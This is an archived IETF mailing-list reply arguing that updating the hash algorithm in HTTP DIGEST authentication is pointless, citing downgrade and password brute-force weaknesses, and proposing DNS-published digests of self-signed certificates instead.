Re: Last Call: draft-bryan-http-digest-algorithm-values-update (Additional Hash Algorithms for HTTP Instance Digests) to Informational RFC

Changing the digest algorithm in DIGEST is pointless.

If you are going to make changes to align the scheme with modern
practice you would replace the digest function with a MAC such as
HMAC.

But there really is no point in doing that because

1) Implementations would still be vulnerable to downgrade attacks.
This is actually a problem with BASIC continuing to exist.

2) The on-the wire protocol is subject to a brute force attack over
the space of possible passwords. Unless we can persuade people to use
passwords longer than 25 characters that is going to be the weakest
point in the system no matter what the algorithm is.

3) RSA is now out of patent, that was the main constraint on DIGEST,
the algorithms had to be unencumbered.


I would be more interested in doing something like using self signed
SSL certs, putting a digest of the cert into the DNS and hoping that
DNSSEC is un-doofused some time this century.

Received on Thursday, 10 December 2009 03:12:12 UTC